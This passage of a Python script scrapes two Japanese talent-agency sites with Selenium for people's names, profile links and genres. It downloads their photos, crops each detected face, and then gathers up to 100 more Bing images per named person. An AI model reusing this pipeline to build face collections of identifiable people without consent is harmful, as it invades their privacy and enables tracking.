                last_page = -((-1 * count_all) // PERSONS_PER_PAGE)  # ceiling division
                for i in range(last_page):
                    print('\tcollect() page: {} {} {} {}'.format(
                        i, last_page, count_all, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                    tables = bs.find_all(
                        'table', id=re.compile('search-results'))
                    if len(tables) > 0:
                        table = tables[0]
                        trs = table.find_all('tr')
                        if len(trs) > 0:
                            for tr in trs:
                                name = ''
                                profile_page = ''
                                try:
                                    # One person's result row.
                                    links = tr.find_all(
                                        'a', class_=re.compile('talent'))
                                    if len(links) > 0:
                                        link = links[0]
                                        name = str(link.text).replace(' ', '')
                                        profile_page = baseUri + \
                                            '/search/' + link.get('href')
                                        genre = tr.findAll(
                                            'td')[3].text.replace('\n', '')
                                        result_names.append(name + ' ' + genre)
                                        # Write a record to the data file.
                                        print('{}\t\t{}\t\t{}'.format(name, profile_page, genre),
                                              file=datafile, flush=True)
                                        # Best-effort thumbnail download.
                                        try:
                                            imgs = tr.find_all('img')
                                            if len(imgs) > 0:
                                                download_img(
                                                    baseUri + imgs[0].get('src'), name)
                                        except:
                                            pass
                                except Exception as e:
                                    print(e, file=logfile, flush=True)
                    # Advance to the next results page (stop when the link is gone).
                    try:
                        clickLink(fox, '次のページ')
                        time.sleep(1)
                        WebDriverWait(fox, WAITING_TIME).until(
                            EC.presence_of_element_located((By.XPATH, '//body')))
                        print('\tcollect() body', file=logfile, flush=True)
                        source = fox.page_source
                        bs = BeautifulSoup(source, 'lxml')
                        print('\tcollect() bs', file=logfile, flush=True)
                    except:
                        break
                # --- Site 2: talemecasting-next ---
                baseUri = baseUris[1]
                targetUri = targetUris[1]
                print('\tcollect() baseUri: {} {}'.format(
                    baseUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                print('\tcollect() targetUri: {} {}'.format(
                    targetUri, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                fox.get(targetUri)
                time.sleep(1)
                WebDriverWait(fox, WAITING_TIME).until(
                    EC.presence_of_element_located((By.XPATH, '//body')))
                print('\tcollect() body', file=logfile, flush=True)
                source = fox.page_source
                bs = BeautifulSoup(source, 'lxml')
                print('\tcollect() bs', file=logfile, flush=True)
                total = bs.find_all(
                    'span', class_=re.compile('required'))
                if len(total) == 0:
                    return
                count_all = int(total[0].text)
                last_page = -((-1 * count_all) // PERSONS_PER_PAGE)  # ceiling division
                for i in range(last_page):
                    print('\tcollect() page: {} {} {} {}'.format(
                        i, last_page, count_all, datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                    uls = bs.find_all('ul', id=re.compile('display-image'))
                    if len(uls) > 0:
                        ul = uls[0]
                        lis = ul.find_all('li')
                        if len(lis) > 0:
                            for li in lis:
                                name = ''
                                profile_page = ''
                                try:
                                    # One person's result card.
                                    divs = li.find_all(
                                        'div', class_='talent-head-img')
                                    summaries = li.find_all(
                                        'div', class_='talent-summary')
                                    if len(divs) > 0:
                                        div = divs[0]
                                        smr = summaries[0]
                                        imgs = div.find_all('img')
                                        if len(imgs) > 0:
                                            img = imgs[0]
                                            # The img alt text carries the name.
                                            name = str(img.get(
                                                'alt')).replace(' ', '')
                                            download_img(img.get('src'), name)
                                        links = li.find_all('a')
                                        if len(links) > 0:
                                            link = links[0]
                                            profile_page = baseUri + \
                                                link.get('href')
                                        genre = smr.find_all(
                                            'div', class_='genre')[0].text.replace('\n', '')
                                        result_names.append(
                                            name + ' ' + genre)
                                        # Write a record to the data file.
                                        print('{}\t\t{}\t\t{}'.format(name, profile_page, genre),
                                              file=datafile, flush=True)
                                except Exception as e:
                                    print(e, file=logfile, flush=True)
                    # Advance to the next results page (stop when 'next' is gone).
                    try:
                        clickClassName(fox, 'next')
                        time.sleep(1)
                        WebDriverWait(fox, WAITING_TIME).until(
                            EC.presence_of_element_located((By.XPATH, '//body')))
                        print('\tcollect() body', file=logfile, flush=True)
                        source = fox.page_source
                        bs = BeautifulSoup(source, 'lxml')
                        print('\tcollect() bs', file=logfile, flush=True)
                    except:
                        break
            except Exception as e:
                print(e, file=logfile, flush=True)
            finally:
                # Cleanup on exit: close the browser session.
                try:
                    fox.close()
                    fox.quit()
                    print('\tcollect() Done: {}'.format(
                        datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')), file=logfile, flush=True)
                except:
                    # NOTE(review): 'e' may be unbound here when no earlier
                    # exception occurred, which would raise NameError itself.
                    print(e, flush=True)
    return result_names
def search(names):
    """Crawl Bing Images for each unique name into data/img/<name>/,
    fetching up to 100 images per person with a pause between crawls."""
    for person in set(names):
        target_dir = os.path.join(PHOTO_DIRPATH, person)
        os.makedirs(target_dir, exist_ok=True)
        image_crawler = BingImageCrawler(storage={"root_dir": target_dir})
        image_crawler.crawl(keyword=person, max_num=100)
        time.sleep(WAITING_TIME_SEARCH)
def clickClassName(fox, className):
    """Locate an element by CSS class name and click it."""
    element = fox.find_element_by_class_name(className)
    element.click()
def clickId(fox, id):
    """Locate an element by its id attribute and click it."""
    element = fox.find_element_by_id(id)
    element.click()
def clickLink(fox, text):
    """Locate an anchor by its exact link text and click it."""
    element = fox.find_element_by_link_text(text)
    element.click()
def clickName(fox, name):
    """Locate an element by its name attribute and click it."""
    element = fox.find_element_by_name(name)
    element.click()
def clickSelector(fox, selector):
    """Locate an element by CSS selector and click it."""
    element = fox.find_element_by_css_selector(selector)
    element.click()
def clickXpath(fox, xpath):
    """Locate an element by XPath expression and click it."""
    element = fox.find_element_by_xpath(xpath)
    element.click()
def clearAndSendKeys(fox, name, text):
    """Clear the input field found by name, then type text into it.

    The element is deliberately looked up twice (once per action), matching
    the original behavior.
    """
    field = fox.find_element_by_name(name)
    field.clear()
    fox.find_element_by_name(name).send_keys(text)
def getFilename(url):
    """Return the final path component of url with any query string stripped."""
    name = os.path.basename(str(url))
    # partition('?')[0] yields the part before '?', or the whole string
    # when no '?' is present -- identical to the conditional split.
    return name.partition('?')[0]
def download_img(url, filename_prefix):
    """Download *url* into PHOTO_DIRPATH and save a crop of every detected face.

    The image is saved as '<filename_prefix>_<url basename>'; each face crop
    gets the crop coordinates appended to its filename. Every step is
    appended to LOG_FILEPATH. Non-200 responses are logged and skipped.
    """
    def ts():
        # Timestamp prefix shared by every log line.
        return datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')

    with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
        print('\tdownload_img() LOG: {} {} {}'.format(
            ts(), url, filename_prefix), file=logfile, flush=True)
        r = requests.get(url, stream=True)
        if r.status_code != 200:
            print('\tdownload_img() get: {} {} {} status: {}'.format(
                ts(), url, filename_prefix, r.status_code), file=logfile, flush=True)
            return
        print('\tdownload_img() get: {} {} {} 200'.format(
            ts(), url, filename_prefix), file=logfile, flush=True)
        filepath = os.path.join(
            PHOTO_DIRPATH, filename_prefix + '_' + getFilename(url))
        with open(filepath, 'wb') as f:
            f.write(r.content)
        print('\tdownload_img() write: {} {} {} 200 f'.format(
            ts(), url, filename_prefix), file=logfile, flush=True)
        # BUG FIX: decode the image only after the 'with' block has closed the
        # file. The original called imread2(f.name) while the handle was still
        # open for writing, so buffered bytes could be missing from disk and
        # the decoder could see a truncated file.
        img = imread2(filepath)
        print('\tdownload_img() imread2: {} {} {} img f type:{}'.format(
            ts(), url, filename_prefix, type(img)), file=logfile, flush=True)
        if img is None:
            return
        print('\tdownload_img() img is not Null: {} {} {}'.format(
            ts(), url, filename_prefix), file=logfile, flush=True)
        src_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        faces = faceCascadeClassifier.detectMultiScale(src_gray)
        print('\tdownload_img() faces: {} {} {}'.format(
            ts(), url, filename_prefix), file=logfile, flush=True)
        for x, y, w, h in faces:
            print('\tdownload_img() faces: {} {} {} xywh: {} {} {} {}'.format(
                ts(), url, filename_prefix, x, y, w, h), file=logfile, flush=True)
            try:
                # Crop rows y..y+h and columns x..x+w from the BGR image.
                face = img[y: y + h, x: x + w]
                filesplt = os.path.splitext(
                    os.path.basename(getFilename(url)))
                facefile = os.path.join(
                    PHOTO_DIRPATH,
                    filename_prefix + '_' + filesplt[0]
                    + '_{:04}-{:04}-{:04}-{:04}'.format(y, y + h, x, x + w)
                    + filesplt[1])
                imwrite2(facefile, face)
            except Exception as e:
                print('Exception: {} {}'.format(
                    ts(), e), file=logfile, flush=True)
if __name__ == '__main__':
    # Log start, run the full collect -> image-search pipeline, log completion.
    with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
        print('Start', file=logfile, flush=True)
    search(collect())
    with open(LOG_FILEPATH, 'a', encoding='utf-8') as logfile:
        print('Done', file=logfile, flush=True)
| 41.369128 | 190 | 0.480748 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.